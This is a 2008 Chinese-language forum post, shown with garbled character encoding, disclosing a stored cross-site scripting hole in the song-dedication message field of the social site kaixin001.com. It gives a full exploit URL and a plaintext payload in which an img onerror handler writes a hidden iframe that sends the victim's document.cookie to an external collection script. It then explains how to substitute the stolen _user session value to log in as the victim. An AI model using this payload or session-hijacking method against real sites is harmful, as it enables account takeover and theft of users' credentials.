2008.9.25,我公布"國(guó)內(nèi)郵箱系統(tǒng)爆發(fā)大規(guī)?缯韭┒"后,F(xiàn)ireF0X就和我說(shuō),什么時(shí)候弄個(gè)XSS的主題寫(xiě)寫(xiě),讓大家也一起討論一下。說(shuō)來(lái)慚愧,也一直沒(méi)寫(xiě)什么東西,這次在"火狐"公布"Kaixin001.comXSS漏洞",也算是給他有個(gè)交代吧。
開(kāi)心網(wǎng)是一個(gè)在線(xiàn)社區(qū),通過(guò)它您可以與朋友、同學(xué)、同事、
家人保持更緊密的聯(lián)系,及時(shí)了解他們的動(dòng)態(tài);
與他們分享你的照片、心情、快樂(lè)。
漏洞描述:開(kāi)心網(wǎng)(www.kaixin001.com),
當(dāng)你在給好友點(diǎn)歌時(shí),你可以留言,
而開(kāi)心對(duì)用戶(hù)留言的數(shù)據(jù)沒(méi)有進(jìn)行嚴(yán)格過(guò)濾,
導(dǎo)致攻擊者可以提交惡意代碼,進(jìn)行跨站攻擊。
攻擊者利用該漏洞可以盜取開(kāi)心網(wǎng)用戶(hù)的cookie,
然后利用Cookie欺騙冒充該用戶(hù)進(jìn)行賬號(hào)登錄。危害嚴(yán)重。
代碼利用:http://www.kaixin001.com/
music/ordermusic.php?verify=××
××_1006_××××_1228989163_×××××&
musicid=32331139&musichost=×××
××&mid=924962&orderuids=×××××&
word=%3Cimg+src%3D%22x%22+
onerror%3D%22document.write%
28%27%3Ciframe+src%3Dhttp%3A%
2F%2Fwww.×××××.com%2Fxss%
2Fxsscu.asp%3F%27%2Bescape%
28document.cookie%29%2B%27+
width%3D0++height%3D0++border%
3D0%3E%3C%2Fiframe%3E%27%29%
22%3E%0D%0A&group=&quiet=1
verify參數(shù)作用是驗(yàn)證用戶(hù)身份
musicid參數(shù)是給好友點(diǎn)播歌曲的ID號(hào)
musichost是自己的開(kāi)心網(wǎng)ID
orderuids是好友開(kāi)心網(wǎng)ID
word是點(diǎn)歌時(shí)留言?xún)?nèi)容
group 用戶(hù)組
quiet 悄悄地(將不會(huì)出現(xiàn)在好友的動(dòng)態(tài)中)
word參數(shù)后可以加入精心構(gòu)造的跨站代碼。
盜取Cookie提交代碼:<img src="x" onerror="document.write('<
iframesrc=http://www.×××.com/xss/
xsscu.asp?'+escape(document.
cookie)+' width=0 height=0 border=0></iframe>')">
這段明文盜取COOKIE代碼,你要轉(zhuǎn)化為URL編碼后再提交。
當(dāng)點(diǎn)歌成功后,惡意代碼將以系統(tǒng)消息的形式,發(fā)送給受害者。
系統(tǒng)會(huì)告訴受害者,你的朋友×××給你點(diǎn)了一首歌。
開(kāi)心網(wǎng)的COOKIE(其實(shí)是Session)格式如下:
SERVERID=_srv102-125_;
_user=
3b45065b00978846edecd20e6dae77
10_×××××_1226381918;
_email=×××××%40126.com; _invisible=0。
你只要把_user中的參數(shù)替換掉,
就可以利用受害者的帳號(hào)進(jìn)行登錄了。
附圖一張:用SESSIONIE,來(lái)收取開(kāi)心COOKIE。
PS:敏感數(shù)據(jù)我用××××代替了,這個(gè)漏洞是首發(fā),
希望大家不要拿它做什么壞事哦,希望大家多多交流,
火狐越來(lái)越好。